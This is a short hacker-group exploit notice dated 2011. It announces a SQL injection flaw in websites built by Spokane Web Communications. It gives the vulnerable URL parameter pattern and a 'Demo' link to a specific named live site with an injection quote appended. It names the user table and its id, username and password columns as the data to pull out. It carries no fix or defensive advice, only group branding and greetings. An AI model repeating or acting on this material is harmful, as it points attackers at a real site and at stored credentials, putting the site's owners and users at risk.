Spokane Web Communications suffers from a remote SQL injection vulnerability.
|* ______ ____ __ __
|* /\__ _\/\ _`\ /\ \/\ \ everythin's black
|* \/_/\ \/\ \ \L\ \\ \ \_\ \ no turning back
|* \ \ \ \ \ _ <'\ \ _ \
|* \ \ \ \ \ \L\ \\ \ \ \ \ [Turkish Hacker]
|* \ \_\ \ \____/ \ \_\ \_\
|* \/_/ \/___/ \/_/\/_/
|* "I'm Bl4ck.Viper Member Of TBH"
|* "http://xpl.skote-vahshat.com"
|[Title] :[Spokane Web Communications Sql Injection Vulnerability]
|[Author] :[Bl4ck.Viper]
|[Home] :[Http://Skote-Vahshat.com]
|[Archive] :[Http://xpl.skote-vahshat.com]
|[Vendor] :[http://www.spokaneweb.net/]
|[Email] :[Bl4ck.Viper@Gmail.Com]
|[Date] :[2011/07/08]
| [+]Exploit :
| http://target.com/news.asp?id=[sqli]
| [+]Demo :
| http://www.spokanemarcom.com/news.asp?id=99'
| table of users : members
| columns of members table :
| id , username , password
| [+]Greets To :
| TBH Team, BHG, Pentesters, H4ckcity, Nopotm
| & All My Friends In Cyber World ...
|=-=-=-=-=-=-=-=-=-=-=-=-=-[Turkish Hacker]=-=-=-=-=-=-=-=-=-=-=-=-=-=|